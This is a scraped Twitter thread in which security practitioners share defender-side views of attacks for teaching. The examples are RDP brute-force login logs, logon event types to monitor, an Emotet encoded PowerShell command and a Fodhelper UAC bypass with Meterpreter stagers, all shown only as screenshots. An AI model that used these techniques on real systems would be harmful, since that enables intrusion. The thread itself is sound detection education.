She's going to be talking about what adversary activity looks like. I've got plenty of screenshots from the attackers perspective, but not much from the defenders side of things
-
-
Prikaži ovu nit
-
Windows perspective is ideal as most of her students are operating in that environment
Prikaži ovu nit
Kraj razgovora
Novi razgovor -
-
-
Note the timestamps associated with the attempted login events. Here we see a successful online password brute forcing attack against RDP. Closer inspection of the log data would reveal the successfully authenticated account and remote IP address.pic.twitter.com/zc3bXUgqBv
-
Funny enough, I'm working on a list of logon event types to watch for. One of my usual indicators is attempts at Type 2 logon from service accounts or interactive logon from workstation to workstation. Outside of Help Desk/IT, I consider it anomalous behavior most places
- Još 1 odgovor
Novi razgovor -
-
-
Does emotet being executed on a users machine count? This has actually become an interview question (showing the PowerShell encoded command) to see how an analyst would figure out what's happening (basically asking that they understand they need to decode a base64 hash).pic.twitter.com/js6aXE5beD
-
That's a good one. Funny enough I was just digging through some of my encoded payloads looking for a good "If you see this, shit's happening" example
- Još 1 odgovor
Novi razgovor -
-
-
http://lockboxx.blogspot.com/2018/02/tamuctf-18-writeup-hso.html … Random writeup from old CTF Not my writeup, so can't grant permission if that's a factor
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi
-
-
-
Does a home user count?https://mobile.twitter.com/voltagex/status/1222384198935183362 …
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi
-
-
-
Here is what a Windows 10 Fodhelper UAC bypass looks like. The payload tries to launch multiple Meterpreter stagers and then when it succeeds, does UAC bypass. The data is from my test environment, since obviously can't share customer datapic.twitter.com/qXOOLCHnfO
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi
-
Čini se da učitavanje traje već neko vrijeme.
Twitter je možda preopterećen ili ima kratkotrajnih poteškoća u radu. Pokušajte ponovno ili potražite dodatne informacije u odjeljku Status Twittera.